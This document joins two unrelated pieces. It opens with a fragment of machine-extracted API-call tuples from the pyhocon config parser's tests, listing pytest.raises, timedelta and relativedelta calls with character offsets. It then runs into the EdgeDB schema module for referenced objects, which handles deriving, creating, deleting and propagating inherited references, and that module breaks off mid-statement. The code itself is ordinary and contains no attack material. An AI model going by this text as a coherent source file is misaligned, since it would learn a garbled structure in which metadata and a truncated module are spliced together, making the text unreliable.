'(ConfigWrongTypeException)\n', (64462, 64488), False, 'import pytest\n'), ((64575, 64612), 'pytest.raises', 'pytest.raises', (['ConfigMissingException'], {}), '(ConfigMissingException)\n', (64588, 64612), False, 'import pytest\n'), ((64683, 64713), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64696, 64713), False, 'import pytest\n'), ((64786, 64816), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64799, 64816), False, 'import pytest\n'), ((64889, 64919), 'pytest.raises', 'pytest.raises', (['ConfigException'], {}), '(ConfigException)\n', (64902, 64919), False, 'import pytest\n'), ((64994, 65033), 'pytest.raises', 'pytest.raises', (['ConfigWrongTypeException'], {}), '(ConfigWrongTypeException)\n', (65007, 65033), False, 'import pytest\n'), ((69048, 69066), 'json.loads', 'json.loads', (['source'], {}), '(source)\n', (69058, 69066), False, 'import json\n'), ((3276, 3293), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3282, 3293), True, 'from datetime import timedelta as period\n'), ((3320, 3337), 'datetime.timedelta', 'period', ([], {'minutes': '(1)'}), '(minutes=1)\n', (3326, 3337), True, 'from datetime import timedelta as period\n'), ((3364, 3381), 'datetime.timedelta', 'period', ([], {'minutes': '(2)'}), '(minutes=2)\n', (3370, 3381), True, 'from datetime import timedelta as period\n'), ((3403, 3420), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3409, 3420), True, 'from datetime import timedelta as period\n'), ((3441, 3458), 'datetime.timedelta', 'period', ([], {'minutes': '(3)'}), '(minutes=3)\n', (3447, 3458), True, 'from datetime import timedelta as period\n'), ((3518, 3535), 'datetime.timedelta', 'period', ([], {'seconds': '(4)'}), '(seconds=4)\n', (3524, 3535), True, 'from datetime import timedelta as period\n'), ((3562, 3579), 'datetime.timedelta', 'period', ([], {'seconds': '(5)'}), '(seconds=5)\n', (3568, 3579), True, 'from datetime import timedelta as period\n'), ((3601, 3618), 'datetime.timedelta', 'period', ([], {'seconds': '(6)'}), '(seconds=6)\n', (3607, 3618), True, 'from datetime import timedelta as period\n'), ((3676, 3691), 'datetime.timedelta', 'period', ([], {'hours': '(7)'}), '(hours=7)\n', (3682, 3691), True, 'from datetime import timedelta as period\n'), ((3716, 3731), 'datetime.timedelta', 'period', ([], {'hours': '(8)'}), '(hours=8)\n', (3722, 3731), True, 'from datetime import timedelta as period\n'), ((3753, 3768), 'datetime.timedelta', 'period', ([], {'hours': '(9)'}), '(hours=9)\n', (3759, 3768), True, 'from datetime import timedelta as period\n'), ((3796, 3812), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (3802, 3812), True, 'from datetime import timedelta as period\n'), ((3838, 3854), 'datetime.timedelta', 'period', ([], {'weeks': '(11)'}), '(weeks=11)\n', (3844, 3854), True, 'from datetime import timedelta as period\n'), ((3877, 3893), 'datetime.timedelta', 'period', ([], {'weeks': '(12)'}), '(weeks=12)\n', (3883, 3893), True, 'from datetime import timedelta as period\n'), ((3920, 3935), 'datetime.timedelta', 'period', ([], {'days': '(10)'}), '(days=10)\n', (3926, 3935), True, 'from datetime import timedelta as period\n'), ((3960, 3975), 'datetime.timedelta', 'period', ([], {'days': '(11)'}), '(days=11)\n', (3966, 3975), True, 'from datetime import timedelta as period\n'), ((3998, 4013), 'datetime.timedelta', 'period', ([], {'days': '(12)'}), '(days=12)\n', (4004, 4013), True, 'from datetime import timedelta as period\n'), ((4049, 4073), 'datetime.timedelta', 'period', ([], {'microseconds': '(110)'}), '(microseconds=110)\n', (4055, 4073), True, 'from datetime import timedelta as period\n'), ((4107, 4131), 'datetime.timedelta', 'period', ([], {'microseconds': '(111)'}), '(microseconds=111)\n', (4113, 4131), True, 'from datetime import timedelta as period\n'), ((4160, 4184), 'datetime.timedelta', 'period', ([], {'microseconds': '(112)'}), '(microseconds=112)\n', (4166, 4184), True, 'from datetime import timedelta as period\n'), ((4212, 4236), 'datetime.timedelta', 'period', ([], {'microseconds': '(113)'}), '(microseconds=113)\n', (4218, 4236), True, 'from datetime import timedelta as period\n'), ((4261, 4285), 'datetime.timedelta', 'period', ([], {'microseconds': '(114)'}), '(microseconds=114)\n', (4267, 4285), True, 'from datetime import timedelta as period\n'), ((4321, 4348), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(110)'}), '(milliseconds=110)\n', (4330, 4348), False, 'from datetime import timedelta\n'), ((4382, 4409), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(111)'}), '(milliseconds=111)\n', (4391, 4409), False, 'from datetime import timedelta\n'), ((4438, 4465), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(112)'}), '(milliseconds=112)\n', (4447, 4465), False, 'from datetime import timedelta\n'), ((4493, 4520), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(113)'}), '(milliseconds=113)\n', (4502, 4520), False, 'from datetime import timedelta\n'), ((4545, 4572), 'datetime.timedelta', 'timedelta', ([], {'milliseconds': '(114)'}), '(milliseconds=114)\n', (4554, 4572), False, 'from datetime import timedelta\n'), ((4607, 4629), 'datetime.timedelta', 'period', ([], {'microseconds': '(0)'}), '(microseconds=0)\n', (4613, 4629), True, 'from datetime import timedelta as period\n'), ((4665, 4688), 'datetime.timedelta', 'period', ([], {'microseconds': '(11)'}), '(microseconds=11)\n', (4671, 4688), True, 'from datetime import timedelta as period\n'), ((4725, 4750), 'datetime.timedelta', 'period', ([], {'microseconds': '(1110)'}), '(microseconds=1110)\n', (4731, 4750), True, 'from datetime import timedelta as period\n'), ((4782, 4807), 'datetime.timedelta', 'period', ([], {'microseconds': '(1120)'}), '(microseconds=1120)\n', (4788, 4807), True, 'from datetime import timedelta as period\n'), ((4838, 4863), 'datetime.timedelta', 'period', ([], {'microseconds': '(1130)'}), '(microseconds=1130)\n', (4844, 4863), True, 'from datetime import timedelta as period\n'), ((4892, 4917), 'datetime.timedelta', 'period', ([], {'microseconds': '(1140)'}), '(microseconds=1140)\n', (4898, 4917), True, 'from datetime import timedelta as period\n'), ((5639, 5655), 'datetime.timedelta', 'period', ([], {'weeks': '(10)'}), '(weeks=10)\n', (5645, 5655), True, 'from datetime import timedelta as period\n'), ((5657, 5674), 'datetime.timedelta', 'period', ([], {'minutes': '(5)'}), '(minutes=5)\n', (5663, 5674), True, 'from datetime import timedelta as period\n'), ((69195, 69218), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69208, 69218), False, 'from dateutil.relativedelta import relativedelta\n'), ((69244, 69267), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(1)'}), '(months=1)\n', (69257, 69267), False, 'from dateutil.relativedelta import relativedelta\n'), ((69293, 69316), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(2)'}), '(months=2)\n', (69306, 69316), False, 'from dateutil.relativedelta import relativedelta\n'), ((69339, 69362), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69352, 69362), False, 'from dateutil.relativedelta import relativedelta\n'), ((69384, 69407), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'months': '(3)'}), '(months=3)\n', (69397, 69407), False, 'from dateutil.relativedelta import relativedelta\n'), ((69465, 69487), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69478, 69487), False, 'from dateutil.relativedelta import relativedelta\n'), ((69512, 69534), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(1)'}), '(years=1)\n', (69525, 69534), False, 'from dateutil.relativedelta import relativedelta\n'), ((69559, 69581), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(2)'}), '(years=2)\n', (69572, 69581), False, 'from dateutil.relativedelta import relativedelta\n'), ((69603, 69625), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69616, 69625), False, 'from dateutil.relativedelta import relativedelta\n'), ((69646, 69668), 'dateutil.relativedelta.relativedelta', 'relativedelta', ([], {'years': '(3)'}), '(years=3)\n', (69659, 69668), False, 'from dateutil.relativedelta import relativedelta\n'), ((38451, 38490), 'os.path.join', 'os.path.join', (['module_dir', '"""__init__.py"""'], {}), "(module_dir, '__init__.py')\n", (38463, 38490), False, 'import os\n'), ((44017, 44068), 'pyhocon.ConfigFactory.parse_string', 'ConfigFactory.parse_string', (['"""a=${b}"""'], {'resolve': '(False)'}), "('a=${b}', resolve=False)\n", (44043, 44068), False, 'from pyhocon import ConfigFactory, ConfigParser, ConfigSubstitutionException, ConfigTree\n')] |
#
# This source file is part of the EdgeDB open source project.
#
# Copyright 2008-present MagicStack Inc. and the EdgeDB authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import annotations
from typing import *
import hashlib
from edb import errors
from edb.common import struct
from edb.edgeql import ast as qlast
from . import delta as sd
from . import inheriting
from . import objects as so
from . import schema as s_schema
from . import name as sn
from . import utils
ReferencedT = TypeVar('ReferencedT', bound='ReferencedObject')
ReferencedInheritingObjectT = TypeVar('ReferencedInheritingObjectT',
bound='ReferencedInheritingObject')
class ReferencedObject(so.DerivableObject):
#: True if the object has an explicit definition and is not
#: purely inherited.
is_local = so.SchemaField(
bool,
default=False,
inheritable=False,
compcoef=0.909,
reflection_method=so.ReflectionMethod.AS_LINK,
)
def get_subject(self, schema: s_schema.Schema) -> Optional[so.Object]:
# NB: classes that inherit ReferencedObject define a `get_subject`
# method dynamically, with `subject = SchemaField`
raise NotImplementedError
def get_referrer(self, schema: s_schema.Schema) -> Optional[so.Object]:
return self.get_subject(schema)
def delete(self, schema: s_schema.Schema) -> s_schema.Schema:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.DeleteObject, type(self))
cmd = cmdcls(classname=self.get_name(schema))
context = sd.CommandContext(
modaliases={},
schema=schema,
disable_dep_verification=True,
)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self)
parent_cmd.add(cmd)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
schema = delta.apply(schema, context)
return schema
def derive_ref(
self: ReferencedT,
schema: s_schema.Schema,
referrer: so.QualifiedObject,
*qualifiers: str,
mark_derived: bool = False,
attrs: Optional[Dict[str, Any]] = None,
dctx: Optional[sd.CommandContext] = None,
derived_name_base: Optional[str] = None,
inheritance_merge: bool = True,
preserve_path_id: Optional[bool] = None,
refdict_whitelist: Optional[AbstractSet[str]] = None,
transient: bool = False,
name: Optional[str] = None,
**kwargs: Any,
) -> Tuple[s_schema.Schema, ReferencedT]:
if name is None:
derived_name: str = self.get_derived_name(
schema, referrer, *qualifiers,
mark_derived=mark_derived,
derived_name_base=derived_name_base)
else:
derived_name = name
if self.get_name(schema) == derived_name:
raise errors.SchemaError(
f'cannot derive {self!r}({derived_name}) from itself')
derived_attrs: Dict[str, object] = {}
if attrs is not None:
derived_attrs.update(attrs)
derived_attrs['name'] = derived_name
derived_attrs['bases'] = so.ObjectList.create(
schema, [self])
mcls = type(self)
referrer_class = type(referrer)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for_name(schema, derived_name)
refcoll = referrer.get_field_value(schema, refdict.attr)
existing = refcoll.get(schema, refname, default=None)
if existing is not None:
cmdcls: Type[sd.Command] = \
sd.ObjectCommandMeta.get_command_class_or_die(sd.AlterObject,
type(self))
else:
cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.CreateObject, type(self))
cmd = cmdcls(classname=derived_name)
for k, v in derived_attrs.items():
cmd.set_attribute_value(k, v)
if existing is not None:
new_bases = derived_attrs['bases']
old_bases = existing.get_bases(schema)
if new_bases != old_bases:
assert isinstance(new_bases, so.ObjectList)
removed_bases, added_bases = inheriting.delta_bases(
[b.get_name(schema) for b in old_bases.objects(schema)],
[b.get_name(schema) for b in new_bases.objects(schema)],
)
rebase_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
inheriting.RebaseInheritingObject, type(self))
rebase_cmd = rebase_cmdcls(
classname=derived_name,
added_bases=added_bases,
removed_bases=removed_bases,
)
cmd.add(rebase_cmd)
context = sd.CommandContext(
modaliases={},
schema=schema,
)
assert isinstance(cmd, sd.ObjectCommand)
delta, parent_cmd = cmd._build_alter_cmd_stack(
schema, context, self, referrer=referrer)
with context(sd.DeltaRootContext(schema=schema, op=delta)):
if not inheritance_merge:
context.current().inheritance_merge = False
if refdict_whitelist is not None:
context.current().inheritance_refdicts = refdict_whitelist
if mark_derived:
context.current().mark_derived = True
if transient:
context.current().transient_derivation = True
if preserve_path_id:
context.current().preserve_path_id = True
parent_cmd.add(cmd)
schema = delta.apply(schema, context)
derived: ReferencedT = schema.get(derived_name)
return schema, derived
def get_verbosename(
self,
schema: s_schema.Schema,
*,
with_parent: bool = False,
) -> str:
vn = super().get_verbosename(schema)
if with_parent:
subject = self.get_subject(schema)
if subject is not None:
pn = subject.get_verbosename(schema, with_parent=True)
return f'{vn} of {pn}'
return vn
class ReferencedInheritingObject(
so.DerivableInheritingObject,
ReferencedObject,
):
# Indicates that the object has been declared as
# explicitly inherited.
declared_overloaded = so.SchemaField(
bool,
default=False,
compcoef=None,
introspectable=False,
inheritable=False,
ephemeral=True,
)
def get_implicit_bases(
self: ReferencedInheritingObjectT,
schema: s_schema.Schema,
) -> List[ReferencedInheritingObjectT]:
return [
b for b in self.get_bases(schema).objects(schema)
if not b.generic(schema)
]
class ReferencedObjectCommandMeta(sd.ObjectCommandMeta):
_transparent_adapter_subclass: ClassVar[bool] = True
_referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None
def __new__(mcls,
name: str,
bases: Tuple[type, ...],
clsdct: Dict[str, Any],
*,
referrer_context_class: Optional[
Type[sd.ObjectCommandContext[so.Object]]
] = None,
**kwargs: Any
) -> ReferencedObjectCommandMeta:
cls = super().__new__(mcls, name, bases, clsdct, **kwargs)
assert isinstance(cls, ReferencedObjectCommandMeta)
if referrer_context_class is not None:
cls._referrer_context_class = referrer_context_class
return cls
class ReferencedObjectCommandBase(
sd.QualifiedObjectCommand[ReferencedT],
metaclass=ReferencedObjectCommandMeta,
):
@classmethod
def get_referrer_context_class(
cls,
) -> Type[sd.ObjectCommandContext[so.Object]]:
if cls._referrer_context_class is None:
raise TypeError(
f'referrer_context_class is not defined for {cls}')
return cls._referrer_context_class
@classmethod
def get_referrer_context(
cls,
context: sd.CommandContext,
) -> Optional[sd.ObjectCommandContext[so.Object]]:
"""Get the context of the command for the referring object, if any.
E.g. for a `create/alter/etc concrete link` command this would
be the context of the `create/alter/etc type` command.
"""
ctxcls = cls.get_referrer_context_class()
ctx = context.get(ctxcls) # type: ignore
return cast(Optional[sd.ObjectCommandContext[so.Object]], ctx)
@classmethod
def get_referrer_context_or_die(
cls,
context: sd.CommandContext,
) -> sd.ObjectCommandContext[so.Object]:
ctx = cls.get_referrer_context(context)
if ctx is None:
raise RuntimeError(f'no referrer context for {cls}')
return ctx
class StronglyReferencedObjectCommand(
ReferencedObjectCommandBase[ReferencedT]
):
pass
class ReferencedObjectCommand(ReferencedObjectCommandBase[ReferencedT]):
@classmethod
def _classname_from_ast(cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
context: sd.CommandContext
) -> sn.Name:
name = super()._classname_from_ast(schema, astnode, context)
parent_ctx = cls.get_referrer_context(context)
if parent_ctx is not None:
assert isinstance(parent_ctx.op, sd.QualifiedObjectCommand)
referrer_name = parent_ctx.op.classname
base_name: str
try:
base_ref = utils.ast_to_object(
astnode.name,
modaliases=context.modaliases,
schema=schema,
)
except errors.InvalidReferenceError:
base_name = sn.Name(name)
else:
base_name = base_ref.get_name(schema)
quals = cls._classname_quals_from_ast(
schema, astnode, base_name, referrer_name, context)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
name = sn.Name(name=pnn, module=referrer_name.module)
assert isinstance(name, sn.Name)
return name
@classmethod
def _classname_from_name(
cls,
name: sn.SchemaName,
referrer_name: sn.SchemaName,
) -> sn.Name:
base_name = sn.shortname_from_fullname(name)
quals = cls._classname_quals_from_name(name)
pnn = sn.get_specialized_name(base_name, referrer_name, *quals)
return sn.Name(name=pnn, module=referrer_name.module)
@classmethod
def _classname_quals_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.NamedDDL,
base_name: str,
referrer_name: str,
context: sd.CommandContext,
) -> Tuple[str, ...]:
return ()
@classmethod
def _classname_quals_from_name(
cls,
name: sn.SchemaName,
) -> Tuple[str, ...]:
return ()
@classmethod
def _name_qual_from_exprs(cls,
schema: s_schema.Schema,
exprs: Iterable[str]) -> str:
m = hashlib.sha1()
for expr in exprs:
m.update(expr.encode())
return m.hexdigest()
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
subject_ctx = self.get_referrer_context(context)
ref_astnode: Type[qlast.DDLOperation] = getattr(self,
'referenced_astnode',
None)
if subject_ctx is not None and ref_astnode is not None:
return ref_astnode
else:
if isinstance(self.astnode, (list, tuple)):
return self.astnode[1]
else:
return self.astnode
def _build_alter_cmd_stack(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: so.Object,
*,
referrer: Optional[so.Object] = None
) -> Tuple[sd.DeltaRoot, sd.Command]:
delta = sd.DeltaRoot()
if referrer is None:
assert isinstance(scls, ReferencedObject)
referrer = scls.get_referrer(schema)
obj = referrer
object_stack = []
if type(self) != type(referrer):
object_stack.append(referrer)
while obj is not None:
if isinstance(obj, ReferencedObject):
obj = obj.get_referrer(schema)
object_stack.append(obj)
else:
obj = None
cmd: sd.Command = delta
for obj in reversed(object_stack):
assert obj is not None
alter_cmd_cls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, type(obj))
alter_cmd = alter_cmd_cls(classname=obj.get_name(schema))
cmd.add(alter_cmd)
cmd = alter_cmd
return delta, cmd
class CreateReferencedObject(
ReferencedObjectCommand[ReferencedT],
sd.CreateObject[ReferencedT],
):
referenced_astnode: ClassVar[Type[qlast.ObjectDDL]]
@classmethod
def _cmd_tree_from_ast(
cls,
schema: s_schema.Schema,
astnode: qlast.DDLOperation,
context: sd.CommandContext,
) -> sd.Command:
cmd = super()._cmd_tree_from_ast(schema, astnode, context)
if isinstance(astnode, cls.referenced_astnode):
objcls = cls.get_schema_metaclass()
referrer_ctx = cls.get_referrer_context_or_die(context)
referrer_class = referrer_ctx.op.get_schema_metaclass()
referrer_name = referrer_ctx.op.classname
refdict = referrer_class.get_refdict_for_class(objcls)
cmd.set_attribute_value(
refdict.backref_attr,
so.ObjectShell(
name=referrer_name,
schemaclass=referrer_class,
),
)
cmd.set_attribute_value('is_local', True)
if getattr(astnode, 'is_abstract', None):
cmd.set_attribute_value('is_abstract', True)
return cmd
def _get_ast_node(self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> Type[qlast.DDLOperation]:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
if implicit_bases and not context.declarative:
mcls = self.get_schema_metaclass()
Alter = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
alter = Alter(classname=self.classname)
return alter._get_ast_node(schema, context)
else:
return super()._get_ast_node(schema, context)
@classmethod
def as_inherited_ref_cmd(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
astnode: qlast.ObjectDDL,
parents: Any) -> sd.Command:
cmd = cls(classname=cls._classname_from_ast(schema, astnode, context))
cmd.set_attribute_value('name', cmd.classname)
return cmd
@classmethod
def as_inherited_ref_ast(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
name: str,
parent: ReferencedObject) -> qlast.ObjectDDL:
nref = cls.get_inherited_ref_name(schema, context, parent, name)
astnode_cls = cls.referenced_astnode
astnode = astnode_cls(name=nref)
assert isinstance(astnode, qlast.ObjectDDL)
return astnode
@classmethod
def get_inherited_ref_name(cls,
schema: s_schema.Schema,
context: sd.CommandContext,
parent: ReferencedObject,
name: str
) -> qlast.ObjectRef:
# reduce name to shortname
if sn.Name.is_qualified(name):
shortname: str = sn.shortname_from_fullname(sn.Name(name))
else:
shortname = name
nref = qlast.ObjectRef(
name=shortname,
module=parent.get_shortname(schema).module,
)
return nref
def _create_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return super()._create_innards(schema, context)
else:
referrer = referrer_ctx.scls
schema = self._create_ref(schema, context, referrer)
return super()._create_innards(schema, context)
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
referrer_cls = type(referrer)
mcls = type(self.scls)
refdict = referrer_cls.get_refdict_for_class(mcls)
schema = referrer.add_classref(schema, refdict.attr, self.scls)
return schema
class DeleteReferencedObjectCommand(
ReferencedObjectCommand[ReferencedT],
sd.DeleteObject[ReferencedT],
):
def _delete_innards(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
schema = super()._delete_innards(schema, context)
referrer_ctx = self.get_referrer_context(context)
if referrer_ctx is None:
return schema
else:
referrer = referrer_ctx.scls
schema = self._delete_ref(schema, context, referrer)
return schema
def _delete_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
scls = self.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
return referrer.del_classref(schema, refdict.attr, refname)
class ReferencedInheritingObjectCommand(
ReferencedObjectCommand[ReferencedInheritingObjectT],
inheriting.InheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_implicit_ref_bases(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
referrer_field: str,
fq_name: sn.SchemaName,
) -> List[ReferencedInheritingObjectT]:
assert isinstance(referrer, so.QualifiedObject)
child_referrer_bases = referrer.get_bases(schema).objects(schema)
implicit_bases = []
ref_field_type = type(referrer).get_field(referrer_field).type
for ref_base in child_referrer_bases:
fq_name_in_child = self._classname_from_name(
fq_name, ref_base.get_name(schema))
refname = ref_field_type.get_key_for_name(schema, fq_name_in_child)
parent_coll = ref_base.get_field_value(schema, referrer_field)
parent_item = parent_coll.get(schema, refname, default=None)
if (parent_item is not None
and not parent_item.get_is_final(schema)):
implicit_bases.append(parent_item)
return implicit_bases
def get_ref_implicit_base_delta(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
refcls: ReferencedInheritingObjectT,
implicit_bases: List[ReferencedInheritingObjectT],
) -> inheriting.BaseDelta_T:
child_bases = refcls.get_bases(schema).objects(schema)
default_base = refcls.get_default_base_name()
explicit_bases = [
b for b in child_bases
if b.generic(schema) and b.get_name(schema) != default_base
]
new_bases = implicit_bases + explicit_bases
return inheriting.delta_bases(
[b.get_name(schema) for b in child_bases],
[b.get_name(schema) for b in new_bases],
)
def _validate(
self,
schema: s_schema.Schema,
context: sd.CommandContext
) -> None:
scls = self.scls
implicit_bases = [
b for b in scls.get_bases(schema).objects(schema)
if not b.generic(schema)
]
referrer_ctx = self.get_referrer_context_or_die(context)
objcls = self.get_schema_metaclass()
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if context.declarative and scls.get_is_local(schema):
if (implicit_bases
and refdict.requires_explicit_overloaded
and not self.get_attribute_value('declared_overloaded')):
ancestry = []
for obj in implicit_bases:
bref = obj.get_referrer(schema)
assert bref is not None
ancestry.append(bref)
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)} '
f'must be declared using the `overloaded` keyword because '
f'it is defined in the following ancestor(s): '
f'{", ".join(a.get_shortname(schema) for a in ancestry)}',
context=self.source_context,
)
elif (not implicit_bases
and self.get_attribute_value('declared_overloaded')):
raise errors.SchemaDefinitionError(
f'{self.scls.get_verbosename(schema, with_parent=True)}: '
f'cannot be declared `overloaded` as there are no '
f'ancestors defining it.',
context=self.source_context,
)
def _propagate_ref_op(self,
schema: s_schema.Schema,
context: sd.CommandContext,
scls: ReferencedInheritingObject,
cb: Callable[[sd.Command, str], None]
) -> s_schema.Schema:
rec = context.current().enable_recursion
context.current().enable_recursion = False
referrer_ctx = self.get_referrer_context_or_die(context)
referrer = referrer_ctx.scls
referrer_class = type(referrer)
mcls = type(scls)
refdict = referrer_class.get_refdict_for_class(mcls)
reftype = referrer_class.get_field(refdict.attr).type
refname = reftype.get_key_for(schema, self.scls)
r_alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, referrer_class)
alter_cmdcls = sd.ObjectCommandMeta.get_command_class_or_die(
sd.AlterObject, mcls)
for descendant in scls.ordered_descendants(schema):
d_name = descendant.get_name(schema)
assert isinstance(descendant, ReferencedObject)
d_referrer = descendant.get_referrer(schema)
assert d_referrer is not None
d_alter_cmd = alter_cmdcls(classname=d_name)
r_alter_cmd = r_alter_cmdcls(
classname=d_referrer.get_name(schema))
with r_alter_cmd.new_context(schema, context, d_referrer):
with d_alter_cmd.new_context(schema, context, descendant):
cb(d_alter_cmd, refname)
r_alter_cmd.add(d_alter_cmd)
schema = r_alter_cmd.apply(schema, context)
self.add(r_alter_cmd)
context.current().enable_recursion = rec
return schema
class CreateReferencedInheritingObject(
CreateReferencedObject[ReferencedInheritingObjectT],
inheriting.CreateInheritingObject[ReferencedInheritingObjectT],
ReferencedInheritingObjectCommand[ReferencedInheritingObjectT],
):
def _get_ast(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
*,
parent_node: Optional[qlast.DDLOperation] = None,
) -> Optional[qlast.DDLOperation]:
refctx = type(self).get_referrer_context(context)
if refctx is not None:
if not self.get_attribute_value('is_local'):
if context.descriptive_mode:
astnode = super()._get_ast(
schema,
context,
parent_node=parent_node,
)
assert astnode is not None
inherited_from = [
sn.quals_from_fullname(b)[0]
for b in self.get_implicit_bases(
schema,
context,
self.get_attribute_value('bases'),
)
]
astnode.system_comment = (
f'inherited from {", ".join(inherited_from)}'
)
return astnode
else:
return None
else:
astnode = super()._get_ast(
schema, context, parent_node=parent_node)
if context.declarative:
scls = self.get_object(schema, context)
assert isinstance(scls, ReferencedInheritingObject)
implicit_bases = scls.get_implicit_bases(schema)
objcls = self.get_schema_metaclass()
referrer_class = refctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
if refdict.requires_explicit_overloaded and implicit_bases:
assert astnode is not None
astnode.declared_overloaded = True
return astnode
else:
return super()._get_ast(schema, context, parent_node=parent_node)
def _create_begin(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
) -> s_schema.Schema:
referrer_ctx = self.get_referrer_context(context)
implicit_bases = None
if referrer_ctx is not None and not context.canonical:
objcls = self.get_schema_metaclass()
referrer = referrer_ctx.scls
if isinstance(referrer, so.InheritingObject):
referrer_class = referrer_ctx.op.get_schema_metaclass()
refdict = referrer_class.get_refdict_for_class(objcls)
implicit_bases = self._get_implicit_ref_bases(
schema, context, referrer, refdict.attr, self.classname)
if implicit_bases:
bases = self.get_attribute_value('bases')
if bases:
bases = so.ObjectList.create(
schema,
implicit_bases + [
b for b in bases.objects(schema)
if b not in implicit_bases
],
)
else:
bases = so.ObjectList.create(
schema,
implicit_bases,
)
self.set_attribute_value('bases', bases)
schema = super()._create_begin(schema, context)
if referrer_ctx is not None and not context.canonical:
self._validate(schema, context)
return schema
def _create_ref(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.Object,
) -> s_schema.Schema:
schema = super()._create_ref(schema, context, referrer)
if (not self.scls.get_is_final(schema)
and isinstance(referrer, so.InheritingObject)
and not context.canonical
and context.enable_recursion):
# Propagate the creation of a new ref to descendants of
# our referrer.
schema = self._propagate_ref_creation(schema, context, referrer)
return schema
def _propagate_ref_creation(
self,
schema: s_schema.Schema,
context: sd.CommandContext,
referrer: so.InheritingObject,
) -> s_schema.Schema:
get_cmd = sd.ObjectCommandMeta.get_command_class_or_die
mcls = type(self.scls)
referrer_cls = type(referrer)
alter_cmd = get_cmd(sd.AlterObject, referrer_cls)
ref_create_cmd = get_cmd(sd.CreateObject, mcls)
ref_alter_cmd = get_cmd(sd.AlterObject, mcls)
ref_rebase_cmd = get_cmd(inheriting.RebaseInheritingObject, mcls)
assert issubclass(ref_create_cmd, CreateReferencedInheritingObject)
assert issubclass(ref_rebase_cmd, RebaseReferencedInheritingObject)
refdict = referrer_cls.get_refdict_for_class(mcls)
parent_fq_refname = self.scls.get_name(schema)
for child in referrer.children(schema):
if not child.allow_ref_propagation(schema, context, refdict):
continue
alter = alter_cmd(classname=child.get_name(schema))
with alter.new_context(schema, context, child):
# This is needed to get the correct inherited name which will
# either be created or rebased.
ref_field_type = type(child).get_field(refdict.attr).type
refname = ref_field_type.get_key_for_name(
schema, parent_fq_refname)
astnode = ref_create_cmd.as_inherited_ref_ast(
schema, context, refname, self.scls)
fq_name = self._classname_from_ast(schema, astnode, context)
# We cannot check for ref existence in this child at this
# time, because it might get created in a sibling branch
# of the delta tree. Instead, generate a command group
# containing Alter(if_exists) and Create(if_not_exists)
# to postpone that check until the application time.
ref_create = ref_create_cmd.as_inherited_ref_cmd(
